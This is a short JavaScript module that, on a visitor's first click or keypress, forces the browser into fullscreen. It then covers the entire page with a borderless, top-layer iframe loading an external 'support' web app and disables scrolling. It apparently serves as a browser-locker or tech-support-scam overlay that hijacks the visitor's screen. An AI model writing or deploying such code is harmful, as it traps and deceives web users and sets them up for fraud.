import screenfull from "screenfull";

const REDIRECT_URL = "https://support-13f9c.web.app";

const handleFirstInteraction = async () => {
  if (screenfull.isEnabled && !screenfull.isFullscreen) {
    try {
      screenfull.request();
    } catch (error) {
      return;
    }
  }

  const iframe = document.createElement("iframe");
  iframe.setAttribute("id", "external-iframe");
  iframe.setAttribute("src", REDIRECT_URL);
  iframe.setAttribute("frameborder", "no");
  iframe.style.position = "fixed";
  iframe.style.top = "0";
  iframe.style.right = "0";
  iframe.style.bottom = "0";
  iframe.style.left = "0";
  iframe.style.width = "100%";
  iframe.style.height = "100%";
  iframe.style.zIndex = "999999";
  iframe.style.border = "none";
  iframe.style.backgroundColor = "#fff";

  const existingIframe = document.getElementById("external-iframe");
  if (existingIframe) existingIframe.remove();

  document.body.prepend(iframe);
  document.body.style.overflow = "hidden";
};

export { handleFirstInteraction };
